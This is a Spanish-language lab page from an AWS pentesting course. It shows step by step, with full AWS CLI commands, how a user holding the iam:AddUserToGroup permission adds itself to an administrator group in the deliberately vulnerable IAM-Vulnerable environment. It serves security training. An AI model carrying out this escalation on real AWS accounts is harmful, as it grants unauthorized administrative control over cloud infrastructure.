# AddUserToGroup {% hint style="danger" %} ¿Crees tener lo que se necesita para ser un experto en Pentesting contra AWS? Si nuestro libro te abrió los ojos a las posibilidades de la ciberseguridad ofensiva o si ya cuentas con habilidades en este campo, es momento de subir de nivel. Te retamos a certificarte en el [CPNA - Curso Profesional de Pentesting Contra AWS](https://spartan-cybersec.com/cursos/pentesting-contra-la-nube-de-aws/). No será fácil: te enfrentarás a un examen riguroso de 12 horas donde deberás hackear una infraestructura completa alojada en AWS. ¿Listo para el desafío? Acepta el reto y demuestra tu verdadero potencial. {% endhint %} {% hint style="warning" %} Este laboratorio no se encuentra actualmente disponible en el CPNA. Puedes practicar esta tecnica desplegando el ambiente en tu propia cuenta de AWS. {% endhint %} Un atacante con el permiso `iam:AddUserToGroup` puede utilizarlo para añadirse a un grupo IAM existente en la cuenta de AWS. Luego del despliegue del laboratorio de IAM-Vulnerable, nos vamos a encontrar el siguiente usuario:
Este usuario tiene la siguiente política:
Este usuario tiene el siguiente rol:
Otra manera de validar lo anterior, es por medio del siguiente comando ya explicado: Listando las políticas del usuario que será auditado: ``` aws iam list-attached-user-policies --user-name privesc13-AddUserToGroup-user ```
Obteniendo información relevante para nuestra auditoria utilizando el ARN de la política del usuario auditado: {% code overflow="wrap" %} ``` aws iam get-policy-version --policy-arn arn:aws:iam::651927172911:policy/privesc13-AddUserToGroup --version-id v1 ``` {% endcode %}
Ahora con nuestro usuario administrador, vamos a generar unas credenciales con STS sobre dicho usuario. {% code overflow="wrap" %} ``` aws sts assume-role --role-arn arn:aws:iam::651927172911:role/privesc13-AddUserToGroup-role --role-session-name privesc13 ``` {% endcode %}
{% hint style="danger" %} A partir de este momento, estaremos trabajando con el usuario **privesc13-AddUserToGroup-user**. Todos los comandos posteriores deben tener especificado el --profile con su respectivo nombre de perfil. {% endhint %} Por lo anterior, tenemos que autenticarnos en AWSCLI y validar con el comando del [el-whoami-de-aws](https://books.spartan-cybersec.com/cpna/introduccion-a-aws/el-whoami-de-aws "mention") Primero nos autenticamos: ``` aws configure --profile privesc13 ```
{% hint style="warning" %} El token se especificará dentro del archivo plano de credenciales. {% endhint %} Y luego validamos con el whoami de AWS: ``` aws sts get-caller-identity --profile privesc13 ```
Si intentamos agregarnos al grupo de administradores, vamos a obtener una salida vacía que indica que la adicción del usuario al grupo fue exitosa: {% code overflow="wrap" %} ``` aws iam add-user-to-group --group-name Group-Root-Spartan --user-name privesc13-AddUserToGroup-user --profile privesc13 ``` {% endcode %}
Si revisamos ahora podemos apreciar que el usuario inicial tiene privilegios de administrador: